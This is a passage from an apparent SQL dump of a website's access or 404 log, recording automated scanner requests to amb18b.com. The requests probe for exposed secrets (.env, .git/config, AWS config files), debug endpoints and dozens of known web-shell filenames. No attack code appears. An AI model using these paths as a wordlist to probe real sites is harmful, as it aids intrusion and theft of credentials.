07:13:53'),(4253,'https://amb18b.com/api/graphql','159.89.12.166','Direct Access',1,'2025-11-07 07:13:55','2025-11-07 07:13:55'),(4254,'https://amb18b.com/graphql/api','159.89.12.166','Direct Access',1,'2025-11-07 07:13:56','2025-11-07 07:13:56'),(4255,'https://amb18b.com/api/gql','159.89.12.166','Direct Access',1,'2025-11-07 07:13:58','2025-11-07 07:13:58'),(4256,'https://amb18b.com/swagger-ui.html','159.89.12.166','Direct Access',1,'2025-11-07 07:13:59','2025-11-07 07:13:59'),(4257,'https://amb18b.com/swagger/index.html','159.89.12.166','Direct Access',1,'2025-11-07 07:14:01','2025-11-07 07:14:01'),(4258,'https://amb18b.com/swagger/swagger-ui.html','159.89.12.166','Direct Access',1,'2025-11-07 07:14:03','2025-11-07 07:14:03'),(4259,'https://amb18b.com/webjars/swagger-ui/index.html','159.89.12.166','Direct Access',1,'2025-11-07 07:14:05','2025-11-07 07:14:05'),(4260,'https://amb18b.com/swagger.json','159.89.12.166','Direct Access',1,'2025-11-07 07:14:06','2025-11-07 07:14:06'),(4261,'https://amb18b.com/swagger/v1/swagger.json','159.89.12.166','Direct Access',1,'2025-11-07 07:14:08','2025-11-07 07:14:08'),(4262,'https://amb18b.com/@vite/env','159.89.12.166','Direct Access',1,'2025-11-07 07:14:10','2025-11-07 07:14:10'),(4263,'https://amb18b.com/actuator/env','159.89.12.166','Direct Access',1,'2025-11-07 07:14:11','2025-11-07 07:14:11'),(4264,'https://amb18b.com/server','159.89.12.166','Direct Access',1,'2025-11-07 07:14:13','2025-11-07 07:14:13'),(4265,'https://amb18b.com/.vscode/sftp.json','159.89.12.166','Direct Access',1,'2025-11-07 07:14:15','2025-11-07 07:14:15'),(4266,'https://amb18b.com/about','159.89.12.166','Direct Access',1,'2025-11-07 07:14:16','2025-11-07 07:14:16'),(4267,'https://amb18b.com/debug/default/view?panel=config','159.89.12.166','Direct Access',1,'2025-11-07 07:14:18','2025-11-07 07:14:18'),(4268,'https://amb18b.com/v2/_catalog','159.89.12.166','Direct Access',1,'2025-11-07 07:14:20','2025-11-07 07:14:20'),(4269,'https://amb18b.com/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application','159.89.12.166','Direct Access',1,'2025-11-07 07:14:22','2025-11-07 07:14:22'),(4270,'https://amb18b.com/server-status','159.89.12.166','Direct Access',1,'2025-11-07 07:14:23','2025-11-07 07:14:23'),(4271,'https://amb18b.com/login.action','159.89.12.166','Direct Access',1,'2025-11-07 07:14:25','2025-11-07 07:14:25'),(4272,'https://amb18b.com/_all_dbs','159.89.12.166','Direct Access',1,'2025-11-07 07:14:27','2025-11-07 07:14:27'),(4273,'https://amb18b.com/.DS_Store','159.89.12.166','Direct Access',1,'2025-11-07 07:14:28','2025-11-07 07:14:28'),(4274,'https://amb18b.com/.env','159.89.12.166','Direct Access',1,'2025-11-07 07:14:30','2025-11-07 07:14:30'),(4275,'https://amb18b.com/.git/config','159.89.12.166','Direct Access',1,'2025-11-07 07:14:31','2025-11-07 07:14:31'),(4276,'https://amb18b.com/s/7383e2934313e27363e2237313/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties','159.89.12.166','Direct Access',1,'2025-11-07 07:14:33','2025-11-07 07:14:33'),(4277,'https://amb18b.com/config.json','159.89.12.166','Direct Access',1,'2025-11-07 07:14:34','2025-11-07 07:14:34'),(4278,'https://amb18b.com/telescope/requests','159.89.12.166','Direct Access',1,'2025-11-07 07:14:36','2025-11-07 07:14:36'),(4279,'https://amb18b.com/info.php','159.89.12.166','Direct Access',1,'2025-11-07 07:14:37','2025-11-07 07:14:37'),(4280,'https://amb18b.com//wp-includes/wlwmanifest.xml','35.231.91.57','Direct Access',1,'2025-11-07 08:35:25','2025-11-07 08:35:25'),(4281,'https://amb18b.com//?author=2','35.231.91.57','Direct Access',1,'2025-11-07 08:35:28','2025-11-07 08:35:28'),(4282,'https://amb18b.com//?author=3','35.231.91.57','Direct Access',1,'2025-11-07 08:35:29','2025-11-07 08:35:29'),(4283,'https://amb18b.com/neshe.php','20.78.70.188','Direct Access',1,'2025-11-07 09:54:48','2025-11-07 09:54:48'),(4284,'https://amb18b.com/error.php','20.78.70.188','Direct Access',1,'2025-11-07 09:54:50','2025-11-07 09:54:50'),(4285,'https://amb18b.com/NH19T66T.php','20.78.70.188','Direct Access',1,'2025-11-07 09:54:52','2025-11-07 09:54:52'),(4286,'https://amb18b.com/rei.php','20.78.70.188','Direct Access',1,'2025-11-07 09:54:55','2025-11-07 09:54:55'),(4287,'https://amb18b.com/666.php','20.78.70.188','Direct Access',1,'2025-11-07 09:54:58','2025-11-07 09:54:58'),(4288,'https://amb18b.com/777.php','20.78.70.188','Direct Access',1,'2025-11-07 09:54:59','2025-11-07 09:54:59'),(4289,'https://amb18b.com/888.php','20.78.70.188','Direct Access',1,'2025-11-07 09:55:02','2025-11-07 09:55:02'),(4290,'https://amb18b.com/555.php','20.78.70.188','Direct Access',1,'2025-11-07 09:55:03','2025-11-07 09:55:03'),(4291,'https://amb18b.com/333.php','20.78.70.188','Direct Access',1,'2025-11-07 09:55:04','2025-11-07 09:55:04'),(4292,'https://amb18b.com/zeal.php','20.78.70.188','Direct Access',1,'2025-11-07 09:55:06','2025-11-07 09:55:06'),(4293,'https://amb18b.com/file.php','20.78.70.188','Direct Access',1,'2025-11-07 09:55:08','2025-11-07 09:55:08'),(4294,'https://amb18b.com/file1.php','20.78.70.188','Direct Access',1,'2025-11-07 09:55:09','2025-11-07 09:55:09'),(4295,'https://amb18b.com/file2.php','20.78.70.188','Direct Access',1,'2025-11-07 09:55:11','2025-11-07 09:55:11'),(4296,'https://amb18b.com/file5.php','20.78.70.188','Direct Access',1,'2025-11-07 09:55:12','2025-11-07 09:55:12'),(4297,'https://amb18b.com/file17.php','20.78.70.188','Direct Access',1,'2025-11-07 09:55:14','2025-11-07 09:55:14'),(4298,'https://amb18b.com/file32.php','20.78.70.188','Direct Access',1,'2025-11-07 09:55:15','2025-11-07 09:55:15'),(4299,'https://amb18b.com/filesss.php','20.78.70.188','Direct Access',1,'2025-11-07 09:55:17','2025-11-07 09:55:17'),(4300,'https://amb18b.com/file9.php','20.78.70.188','Direct Access',1,'2025-11-07 09:55:18','2025-11-07 09:55:18'),(4301,'https://amb18b.com/file13.php','20.78.70.188','Direct Access',1,'2025-11-07 09:55:20','2025-11-07 09:55:20'),(4302,'https://amb18b.com/file3.php','20.78.70.188','Direct Access',1,'2025-11-07 09:55:23','2025-11-07 09:55:23'),(4303,'https://amb18b.com/atomlib.php','20.78.70.188','Direct Access',1,'2025-11-07 09:55:25','2025-11-07 09:55:25'),(4304,'https://amb18b.com/manager.php','20.78.70.188','Direct Access',1,'2025-11-07 09:55:28','2025-11-07 09:55:28'),(4305,'https://amb18b.com/abcd.php','20.78.70.188','Direct Access',1,'2025-11-07 09:55:29','2025-11-07 09:55:29'),(4306,'https://amb18b.com/efile.php','20.78.70.188','Direct Access',1,'2025-11-07 09:55:31','2025-11-07 09:55:31'),(4307,'https://amb18b.com/file18.php','20.78.70.188','Direct Access',1,'2025-11-07 09:55:33','2025-11-07 09:55:33'),(4308,'https://amb18b.com/520.php','20.78.70.188','Direct Access',1,'2025-11-07 09:55:34','2025-11-07 09:55:34'),(4309,'https://amb18b.com/031.php','20.78.70.188','Direct Access',1,'2025-11-07 09:55:35','2025-11-07 09:55:35'),(4310,'https://amb18b.com/file7.php','20.78.70.188','Direct Access',1,'2025-11-07 09:55:37','2025-11-07 09:55:37'),(4311,'https://amb18b.com/file4.php','20.78.70.188','Direct Access',1,'2025-11-07 09:55:39','2025-11-07 09:55:39'),(4312,'https://amb18b.com/2%25.php','20.78.70.188','Direct Access',1,'2025-11-07 09:55:41','2025-11-07 09:55:41'),(4313,'https://amb18b.com/1%25.php','20.78.70.188','Direct Access',1,'2025-11-07 09:55:42','2025-11-07 09:55:42'),(4314,'https://amb18b.com/wp-freya.php','20.78.70.188','Direct Access',1,'2025-11-07 09:55:44','2025-11-07 09:55:44'),(4315,'https://amb18b.com/keu.php','20.78.70.188','Direct Access',1,'2025-11-07 09:55:46','2025-11-07 09:55:46'),(4316,'https://amb18b.com/file88.php','20.78.70.188','Direct Access',1,'2025-11-07 09:55:48','2025-11-07 09:55:48'),(4317,'https://amb18b.com/0%25.php','20.78.70.188','Direct Access',1,'2025-11-07 09:55:50','2025-11-07 09:55:50'),(4318,'https://amb18b.com/lock360.php','20.78.70.188','Direct Access',1,'2025-11-07 09:55:51','2025-11-07 09:55:51'),(4319,'https://amb18b.com/jmfi2.php','20.78.70.188','Direct Access',1,'2025-11-07 09:55:52','2025-11-07 09:55:52'),(4320,'https://amb18b.com/class.1.php','20.78.70.188','Direct Access',1,'2025-11-07 09:55:54','2025-11-07 09:55:54'),(4321,'https://amb18b.com/an.php','20.78.70.188','Direct Access',1,'2025-11-07 09:55:55','2025-11-07 09:55:55'),(4322,'https://amb18b.com/fs.php','20.78.70.188','Direct Access',1,'2025-11-07 09:55:57','2025-11-07 09:55:57'),(4323,'https://amb18b.com/gfile.php','20.78.70.188','Direct Access',1,'2025-11-07 09:56:00','2025-11-07 09:56:00'),(4324,'https://amb18b.com/file6.php','20.78.70.188','Direct Access',1,'2025-11-07 09:56:03','2025-11-07 09:56:03'),(4325,'https://amb18b.com/eauu.php','20.78.70.188','Direct Access',1,'2025-11-07 09:56:05','2025-11-07 09:56:05'),(4326,'https://amb18b.com/we.php','20.78.70.188','Direct Access',1,'2025-11-07 09:56:09','2025-11-07 09:56:09'),(4327,'https://amb18b.com/fe5.php','20.78.70.188','Direct Access',1,'2025-11-07 09:56:11','2025-11-07 09:56:11'),(4328,'https://amb18b.com/cccc.php','20.78.70.188','Direct Access',1,'2025-11-07 09:56:12','2025-11-07 09:56:12'),(4329,'https://amb18b.com/gmo.php','20.78.70.188','Direct Access',1,'2025-11-07 09:56:14','2025-11-07 09:56:14'),(4330,'https://amb18b.com/shell1.php','20.78.70.188','Direct Access',1,'2025-11-07 09:56:15','2025-11-07 09:56:15'),(4331,'https://amb18b.com/gm.php','20.78.70.188','Direct Access',1,'2025-11-07 09:56:17','2025-11-07 09:56:17'),(4332,'https://amb18b.com/lala.php','20.78.70.188','Direct Access',1,'2025-11-07 09:56:19','2025-11-07 09:56:19'),(4333,'https://amb18b.com/hexx.php','20.78.70.188','Direct Access',1,'2025-11-07 09:56:21','2025-11-07 09:56:21'),(4334,'https://amb18b.com/444.php','20.78.70.188','Direct Access',1,'2025-11-07 09:56:22','2025-11-07 09:56:22'),(4335,'https://amb18b.com/a2.php','20.78.70.188','Direct Access',1,'2025-11-07 09:56:24','2025-11-07 09:56:24'),(4336,'https://amb18b.com/cfile.php','20.78.70.188','Direct Access',1,'2025-11-07 09:56:25','2025-11-07 09:56:25'),(4337,'https://amb18b.com/lv.php','20.78.70.188','Direct Access',1,'2025-11-07 09:56:27','2025-11-07 09:56:27'),(4338,'https://amb18b.com/goat.php','20.78.70.188','Direct Access',1,'2025-11-07 09:56:29','2025-11-07 09:56:29'),(4339,'https://amb18b.com/222.php','20.78.70.188','Direct Access',1,'2025-11-07 09:56:30','2025-11-07 09:56:30'),(4340,'https://amb18b.com/aa.php','20.78.70.188','Direct Access',1,'2025-11-07 09:56:32','2025-11-07 09:56:32'),(4341,'https://amb18b.com/vast.php','20.78.70.188','Direct Access',1,'2025-11-07 09:56:33','2025-11-07 09:56:33'),(4342,'https://amb18b.com/cool.php','20.78.70.188','Direct Access',1,'2025-11-07 09:56:37','2025-11-07 09:56:37'),(4343,'https://amb18b.com/yanki.php','20.78.70.188','Direct Access',1,'2025-11-07 09:56:40','2025-11-07 09:56:40'),(4344,'https://amb18b.com/bolt.php','20.78.70.188','Direct Access',1,'2025-11-07 09:56:42','2025-11-07 09:56:42'),(4345,'https://amb18b.com/nfile.php','20.78.70.188','Direct Access',1,'2025-11-07 09:56:44','2025-11-07 09:56:44'),(4346,'https://amb18b.com/ilex.php','20.78.70.188','Direct Access',1,'2025-11-07 09:56:45','2025-11-07 09:56:45'),(4347,'https://amb18b.com/des.php','20.78.70.188','Direct Access',1,'2025-11-07 09:56:47','2025-11-07 09:56:47'),(4348,'https://amb18b.com/ext.php','20.78.70.188','Direct Access',1,'2025-11-07 09:56:49','2025-11-07 09:56:49'),(4349,'https://amb18b.com/axx.php','20.78.70.188','Direct Access',1,'2025-11-07 09:56:50','2025-11-07 09:56:50'),(4350,'https://amb18b.com/wp-update.php','20.78.70.188','Direct Access',1,'2025-11-07 09:56:52','2025-11-07 09:56:52'),(4351,'https://amb18b.com/yasnu.php','20.78.70.188','Direct Access',1,'2025-11-07 09:56:53','2025-11-07 09:56:53'),(4352,'https://amb18b.com/new4.php','20.78.70.188','Direct Access',1,'2025-11-07 09:56:55','2025-11-07 09:56:55'),(4353,'https://amb18b.com/ava.php','20.78.70.188','Direct Access',1,'2025-11-07 09:56:56','2025-11-07 09:56:56'),(4354,'https://amb18b.com/ioxi2.php','20.78.70.188','Direct Access',1,'2025-11-07 09:56:58','2025-11-07 09:56:58'),(4355,'https://amb18b.com/gfile1.php','20.78.70.188','Direct Access',1,'2025-11-07 09:56:59','2025-11-07 09:56:59'),(4356,'https://amb18b.com/ffile.php','20.78.70.188','Direct Access',1,'2025-11-07 09:57:01','2025-11-07 09:57:01'),(4357,'https://amb18b.com/rsnu.php','20.78.70.188','Direct Access',1,'2025-11-07 09:57:04','2025-11-07 09:57:04'),(4358,'https://amb18b.com/.well-known/acme-challenge/about.php','20.78.70.188','Direct Access',1,'2025-11-07 09:57:05','2025-11-07 09:57:05'),(4359,'https://amb18b.com/default.php','20.78.70.188','Direct Access',1,'2025-11-07 09:57:07','2025-11-07 09:57:07'),(4360,'https://amb18b.com/dfre.php','20.78.70.188','Direct Access',1,'2025-11-07 09:57:08','2025-11-07 09:57:08'),(4361,'https://amb18b.com/pp.php','20.78.70.188','Direct Access',1,'2025-11-07 09:57:10','2025-11-07 09:57:10'),(4362,'https://amb18b.com/13.php','20.78.70.188','Direct Access',1,'2025-11-07 09:57:11','2025-11-07 09:57:11'),(4363,'https://amb18b.com/usep.php','20.78.70.188','Direct Access',1,'2025-11-07 09:57:12','2025-11-07 09:57:12'),(4364,'https://amb18b.com/3.php','20.78.70.188','Direct Access',1,'2025-11-07 09:57:13','2025-11-07 09:57:13'),(4365,'https://amb18b.com/pn.php','20.78.70.188','Direct Access',1,'2025-11-07 09:57:15','2025-11-07 09:57:15'),(4366,'https://amb18b.com/media/system/js/core.js','35.237.138.91','Direct Access',1,'2025-11-07 13:49:21','2025-11-07 13:49:21'),(4367,'https://amb18b.com//wp-includes/ID3/license.txt','140.245.45.122','Direct Access',1,'2025-11-07 13:56:09','2025-11-07 13:56:09'),(4368,'https://amb18b.com/?author=2','140.245.45.122','Direct Access',1,'2025-11-07 13:56:12','2025-11-07 13:56:12'),(4369,'https://amb18b.com//wp-includes/wlwmanifest.xml','35.237.138.91','Direct Access',1,'2025-11-07 14:24:59','2025-11-07 14:24:59'),(4370,'https://amb18b.com//?author=2','35.237.138.91','Direct Access',1,'2025-11-07 14:25:01','2025-11-07 14:25:01'),(4371,'https://amb18b.com/old/','34.94.252.43','Direct Access',1,'2025-11-07 16:18:05','2025-11-07 16:18:05'),(4372,'https://amb18b.com/backup/','34.94.252.43','Direct Access',1,'2025-11-07 16:18:07','2025-11-07 16:18:07'),(4373,'https://amb18b.com/wordpress/','34.94.252.43','Direct Access',1,'2025-11-07 16:18:08','2025-11-07 16:18:08'),(4374,'https://amb18b.com/blog/','34.94.252.43','Direct Access',1,'2025-11-07 16:18:09','2025-11-07 16:18:10'),(4375,'https://amb18b.com/new/','34.94.252.43','Direct Access',1,'2025-11-07 16:18:12','2025-11-07 16:18:12'),(4376,'https://amb18b.com/wp/','34.94.252.43','Direct Access',1,'2025-11-07 16:18:13','2025-11-07 16:18:13'),(4377,'https://amb18b.com/.env','195.178.110.201','Direct Access',1,'2025-11-07 18:07:44','2025-11-07 18:07:44'),(4378,'https://amb18b.com/.git/config','195.178.110.201','Direct Access',1,'2025-11-07 18:07:45','2025-11-07 18:07:45'),(4379,'https://amb18b.com/backend/.env','195.178.110.201','Direct Access',1,'2025-11-07 18:07:47','2025-11-07 18:07:47'),(4380,'https://amb18b.com/admin/.env','195.178.110.201','Direct Access',1,'2025-11-07 18:07:49','2025-11-07 18:07:49'),(4381,'https://amb18b.com/core/.env','195.178.110.201','Direct Access',1,'2025-11-07 18:07:53','2025-11-07 18:07:53'),(4382,'https://amb18b.com/.env.bak','195.178.110.201','Direct Access',1,'2025-11-07 18:07:57','2025-11-07 18:07:57'),(4383,'https://amb18b.com/.git/logs/HEAD','195.178.110.201','Direct Access',1,'2025-11-07 18:07:59','2025-11-07 18:07:59'),(4384,'https://amb18b.com/.gitlab-ci.yml','195.178.110.201','Direct Access',1,'2025-11-07 18:08:02','2025-11-07 18:08:02'),(4385,'https://amb18b.com/config.json','195.178.110.201','Direct Access',1,'2025-11-07 18:08:07','2025-11-07 18:08:07'),(4386,'https://amb18b.com/config.js','195.178.110.201','Direct Access',1,'2025-11-07 18:08:12','2025-11-07 18:08:12'),(4387,'https://amb18b.com/aws-config.js','195.178.110.201','Direct Access',1,'2025-11-07 18:08:19','2025-11-07 18:08:19'),(4388,'https://amb18b.com/aws.config.js','195.178.110.201','Direct Access',1,'2025-11-07 18:08:25','2025-11-07 18:08:25'),(4389,'https://amb18b.com/?author=2','178.128.95.221','Direct Access',1,'2025-11-07 18:08:41','2025-11-07 18:08:41'),(4390,'https://amb18b.com/.env','93.123.109.132','Direct Access',1,'2025-11-07 18:59:00','2025-11-07 18:59:00'),(4391,'https://amb18b.com/.git/config','93.123.109.132','Direct Access',1,'2025-11-07 18:59:08','2025-11-07 18:59:08'),(4392,'https://amb18b.com/backend/.env','93.123.109.132','Direct Access',1,'2025-11-07 18:59:11','2025-11-07 18:59:11'),(4393,'https://amb18b.com/admin/.env','93.123.109.132','Direct Access',1,'2025-11-07 18:59:14','2025-11-07 18:59:14'),(4394,'https://amb18b.com/core/.env','93.123.109.132','Direct Access',1,'2025-11-07 18:59:16','2025-11-07 18:59:16'),(4395,'https://amb18b.com/.env.bak','93.123.109.132','Direct Access',1,'2025-11-07 18:59:21','2025-11-07 18:59:21'),(4396,'https://amb18b.com/.git/logs/HEAD','93.123.109.132','Direct Access',1,'2025-11-07 18:59:23','2025-11-07 18:59:23'),(4397,'https://amb18b.com/.gitlab-ci.yml','93.123.109.132','Direct Access',1,'2025-11-07 18:59:27','2025-11-07 18:59:27'),(4398,'https://amb18b.com/config.json','93.123.109.132','Direct Access',1,'2025-11-07 18:59:33','2025-11-07 18:59:33'),(4399,'https://amb18b.com/config.js','93.123.109.132','Direct Access',1,'2025-11-07 18:59:35','2025-11-07 18:59:35'),(4400,'https://amb18b.com/aws-config.js','93.123.109.132','Direct Access',1,'2025-11-07 18:59:38','2025-11-07 18:59:38'),(4401,'https://amb18b.com/aws.config.js','93.123.109.132','Direct Access',1,'2025-11-07 18:59:42','2025-11-07 18:59:42'),(4402,'https://amb18b.com/htaccess.php','20.222.66.73','Direct Access',1,'2025-11-07 20:19:55','2025-11-07 20:19:55'),(4403,'https://amb18b.com/readme.php','20.222.66.73','Direct Access',1,'2025-11-07 20:19:56','2025-11-07 20:19:56'),(4404,'https://amb18b.com/as.php','20.222.66.73','Direct Access',1,'2025-11-07 20:19:58','2025-11-07 20:19:58'),(4405,'https://amb18b.com/403.php','20.222.66.73','Direct Access',2,'2025-11-07 20:21:28','2025-11-07 20:19:59'),(4406,'https://amb18b.com/max.php','20.222.66.73','Direct Access',1,'2025-11-07 20:20:00','2025-11-07 20:20:00'),(4407,'https://amb18b.com/m.php','20.222.66.73','Direct Access',1,'2025-11-07 20:20:02','2025-11-07 20:20:02'),(4408,'https://amb18b.com/post.php','20.222.66.73','Direct Access',1,'2025-11-07 20:20:03','2025-11-07 20:20:03'),(4409,'https://amb18b.com/themes.php','20.222.66.73','Direct Access',1,'2025-11-07 20:20:05','2025-11-07 20:20:05'),(4410,'https://amb18b.com/ALFA_DATA/index.php','20.222.66.73','Direct Access',1,'2025-11-07 20:20:07','2025-11-07 20:20:07'),(4411,'https://amb18b.com/wp-admin/maint/about.php','20.222.66.73','Direct Access',1,'2025-11-07 20:20:08','2025-11-07 20:20:08'),(4412,'https://amb18b.com/wp-admin/network/wp-conflg.php?p=','20.222.66.73','Direct Access',1,'2025-11-07 20:20:11','2025-11-07 20:20:11'),(4413,'https://amb18b.com/click.php','20.222.66.73','Direct Access',1,'2025-11-07 20:20:12','2025-11-07 20:20:12'),(4414,'https://amb18b.com/install.php','20.222.66.73','Direct Access',1,'2025-11-07 20:20:14','2025-11-07 20:20:14'),(4415,'https://amb18b.com/lv.php','20.222.66.73','Direct Access',1,'2025-11-07 20:20:15','2025-11-07 20:20:15'),(4416,'https://amb18b.com/simple.php','20.222.66.73','Direct Access',1,'2025-11-07 20:20:17','2025-11-07 20:20:17'),(4417,'https://amb18b.com/13k.php','20.222.66.73','Direct Access',1,'2025-11-07 20:20:18','2025-11-07 20:20:18'),(4418,'https://amb18b.com/css.php','20.222.66.73','Direct Access',2,'2025-11-07 20:20:44','2025-11-07 20:20:19'),(4419,'https://amb18b.com/up.php?x=','20.222.66.73','Direct Access',1,'2025-11-07 20:20:21','2025-11-07 20:20:21'),(4420,'https://amb18b.com/0x1949.php','20.222.66.73','Direct Access',1,'2025-11-07 20:20:22','2025-11-07 20:20:22'),(4421,'https://amb18b.com/cong.php','20.222.66.73','Direct Access',2,'2025-11-07 20:20:33','2025-11-07 20:20:23'),(4422,'https://amb18b.com/fw.php','20.222.66.73','Direct Access',1,'2025-11-07 20:20:24','2025-11-07 20:20:24'),(4423,'https://amb18b.com/bs1.php','20.222.66.73','Direct Access',1,'2025-11-07 20:20:26','2025-11-07 20:20:26'),(4424,'https://amb18b.com/wp-includes/images/wp-login.php','20.222.66.73','Direct Access',1,'2025-11-07 20:20:27','2025-11-07 20:20:27'),(4425,'https://amb18b.com/termps.php','20.222.66.73','Direct Access',1,'2025-11-07 20:20:28','2025-11-07 20:20:28'),(4426,'https://amb18b.com/brand.php','20.222.66.73','Direct Access',1,'2025-11-07 20:20:30','2025-11-07 20:20:30'),(4427,'https://amb18b.com/goods.php','20.222.66.73','Direct Access',2,'2025-11-07 20:22:35','2025-11-07 20:20:31'),(4428,'https://amb18b.com/atomlib.php','20.222.66.73','Direct Access',1,'2025-11-07 20:20:34','2025-11-07 20:20:34'),(4429,'https://amb18b.com/w.php','20.222.66.73','Direct Access',1,'2025-11-07 20:20:35','2025-11-07 20:20:35'),(4430,'https://amb18b.com/404.php?fm=true','20.222.66.73','Direct Access',1,'2025-11-07 20:20:36','2025-11-07 20:20:36'),(4431,'https://amb18b.com/404.php','20.222.66.73','Direct Access',2,'2025-11-07 20:21:19','2025-11-07 20:20:37'),(4432,'https://amb18b.com/article.php','20.222.66.73','Direct Access',2,'2025-11-07 20:21:24','2025-11-07 20:20:39'),(4433,'https://amb18b.com/0x.php','20.222.66.73','Direct Access',2,'2025-11-07 20:20:55','2025-11-07 20:20:43'),(4434,'https://amb18b.com/modules/mod_simplefileuploadv1.3/elements/filemanager.php?p=','20.222.66.73','Direct Access',1,'2025-11-07 20:20:45','2025-11-07 20:20:45'),(4435,'https://amb18b.com/1.php','20.222.66.73','Direct Access',2,'2025-11-07 20:21:27','2025-11-07 20:20:47'),(4436,'https://amb18b.com/admin.php','20.222.66.73','Direct Access',2,'2025-11-07 20:22:47','2025-11-07 20:20:48'),(4437,'https://amb18b.com/wp-admin/maint/maint.php','20.222.66.73','Direct Access',1,'2025-11-07 20:20:50','2025-11-07 20:20:50'),(4438,'https://amb18b.com/classwithtostring.php','20.222.66.73','Direct Access',1,'2025-11-07 20:20:51','2025-11-07 20:20:51'),(4439,'https://amb18b.com/dropdown.php','20.222.66.73','Direct Access',1,'2025-11-07 20:20:53','2025-11-07 20:20:53'),(4440,'https://amb18b.com/moon.php','20.222.66.73','Direct Access',1,'2025-11-07 20:20:54','2025-11-07 20:20:54'),(4441,'https://amb18b.com/moon.php?p=','20.222.66.73','Direct Access',1,'2025-11-07 20:20:56','2025-11-07 20:20:56'),(4442,'https://amb18b.com/autoload_classmap.php?p=','20.222.66.73','Direct Access',1,'2025-11-07 20:20:57','2025-11-07 20:20:57'),(4443,'https://amb18b.com/inputs.php','20.222.66.73','Direct Access',1,'2025-11-07 20:20:59','2025-11-07 20:20:59'),(4444,'https://amb18b.com/default.php','20.222.66.73','Direct Access',1,'2025-11-07 20:21:00','2025-11-07 20:21:00'),(4445,'https://amb18b.com/fm.php?p=','20.222.66.73','Direct Access',1,'2025-11-07 20:21:01','2025-11-07 20:21:02'),(4446,'https://amb18b.com/fm.php?fm=true','20.222.66.73','Direct Access',1,'2025-11-07 20:21:03','2025-11-07 20:21:03'),(4447,'https://amb18b.com/about.php','20.222.66.73','Direct Access',1,'2025-11-07 20:21:04','2025-11-07 20:21:04'),(4448,'https://amb18b.com/file.php?','20.222.66.73','Direct Access',1,'2025-11-07 20:21:05','2025-11-07 20:21:05'),(4449,'https://amb18b.com/alfa.php','20.222.66.73','Direct Access',2,'2025-11-07 20:21:25','2025-11-07 20:21:06'),(4450,'https://amb18b.com/buy.php','20.222.66.73','Direct Access',1,'2025-11-07 20:21:07','2025-11-07 20:21:07'),(4451,'https://amb18b.com/themes/twentytwentytwo/index.php','20.222.66.73','Direct Access',1,'2025-11-07 20:21:09','2025-11-07 20:21:09'),(4452,'https://amb18b.com/wp-admin/js/wp-conflg.php?p=','20.222.66.73','Direct Access',1,'2025-11-07 20:21:10','2025-11-07 20:21:10'),(4453,'https://amb18b.com/wp-admin/wp-conflg.php?p=','20.222.66.73','Direct Access',1,'2025-11-07 20:21:11','2025-11-07 20:21:11'),(4454,'https://amb18b.com/wp-admin/css/wp-conflg.php?p=','20.222.66.73','Direct Access',1,'2025-11-07 20:21:12','2025-11-07 20:21:12'),(4455,'https://amb18b.com/manager.php?p=','20.222.66.73','Direct Access',1,'2025-11-07 20:21:13','2025-11-07 20:21:13'),(4456,'https://amb18b.com/js/fm.php','20.222.66.73','Direct Access',1,'2025-11-07 20:21:15','2025-11-07 20:21:15'),(4457,'https://amb18b.com/item.php','20.222.66.73','Direct Access',1,'2025-11-07 20:21:16','2025-11-07 20:21:16'),(4458,'https://amb18b.com/plugins/Cache/footer.php','20.222.66.73','Direct Access',1,'2025-11-07 20:21:17','2025-11-07 20:21:17'),(4459,'https://amb18b.com/mail.php','20.222.66.73','Direct Access',1,'2025-11-07 20:21:20','2025-11-07 20:21:20'),(4460,'https://amb18b.com/sx.php','20.222.66.73','Direct Access',1,'2025-11-07 20:21:21','2025-11-07 20:21:21'),(4461,'https://amb18b.com/wp-admin/maint/admin.php','20.222.66.73','Direct Access',1,'2025-11-07 20:21:22','2025-11-07 20:21:22'),(4462,'https://amb18b.com/link.php','20.222.66.73','Direct Access',1,'2025-11-07 20:21:29','2025-11-07 20:21:29'),(4463,'https://amb18b.com/byp.php','20.222.66.73','Direct Access',1,'2025-11-07 20:21:30','2025-11-07 20:21:30'),(4464,'https://amb18b.com/bak.php','20.222.66.73','Direct Access',1,'2025-11-07 20:21:31','2025-11-07 20:21:31'),(4465,'https://amb18b.com/ini.php','20.222.66.73','Direct Access',1,'2025-11-07 20:21:32','2025-11-07 20:21:32'),(4466,'https://amb18b.com/ws.php','20.222.66.73','Direct Access',1,'2025-11-07 20:21:34','2025-11-07 20:21:34'),(4467,'https://amb18b.com/wp-trackback.php','20.222.66.73','Direct Access',1,'2025-11-07 20:21:35','2025-11-07 20:21:35'),(4468,'https://amb18b.com/.well-known/index.php','20.222.66.73','Direct Access',1,'2025-11-07 20:21:36','2025-11-07 20:21:36'),(4469,'https://amb18b.com/wp-includes/certificates/plugins.php','20.222.66.73','Direct Access',1,'2025-11-07 20:21:37','2025-11-07 20:21:37'),(4470,'https://amb18b.com/chosen.php','20.222.66.73','Direct Access',1,'2025-11-07 20:21:43','2025-11-07 20:21:43'),(4471,'https://amb18b.com/wp-includes/ID3/about.php','20.222.66.73','Direct Access',1,'2025-11-07 20:21:45','2025-11-07 20:21:45'),(4472,'https://amb18b.com/css/index.php','20.222.66.73','Direct Access',1,'2025-11-07 20:21:46','2025-11-07 20:21:46'),(4473,'https://amb18b.com/wp-admin/includes/xmrlpc.php?p=','20.222.66.73','Direct Access',1,'2025-11-07 20:21:47','2025-11-07 20:21:47'),(4474,'https://amb18b.com/wp-includes/SimplePie/wp-login.php','20.222.66.73','Direct Access',1,'2025-11-07 20:21:48','2025-11-07 20:21:48'),(4475,'https://amb18b.com/filemanager/dialog.php','20.222.66.73','Direct Access',1,'2025-11-07 20:21:50','2025-11-07 20:21:50'),(4476,'https://amb18b.com/wp-admin/maint/index.php','20.222.66.73','Direct Access',1,'2025-11-07 20:21:52','2025-11-07 20:21:52'),(4477,'https://amb18b.com/wp-includes/Requests/Text/admin.php','20.222.66.73','Direct Access',1,'2025-11-07 20:21:53','2025-11-07 20:21:53'),(4478,'https://amb18b.com/wp-includes/customize/about.php','20.222.66.73','Direct Access',1,'2025-11-07 20:21:54','2025-11-07 20:21:54'),(4479,'https://amb18b.com/index/function.php','20.222.66.73','Direct Access',1,'2025-11-07 20:21:55','2025-11-07 20:21:55'),(4480,'https://amb18b.com/uploads/autoload_classmap.php','20.222.66.73','Direct Access',1,'2025-11-07 20:21:56','2025-11-07 20:21:56'),(4481,'https://amb18b.com/wp-includes/css/dist/preferences/wp-login.php','20.222.66.73','Direct Access',1,'2025-11-07 20:21:57','2025-11-07 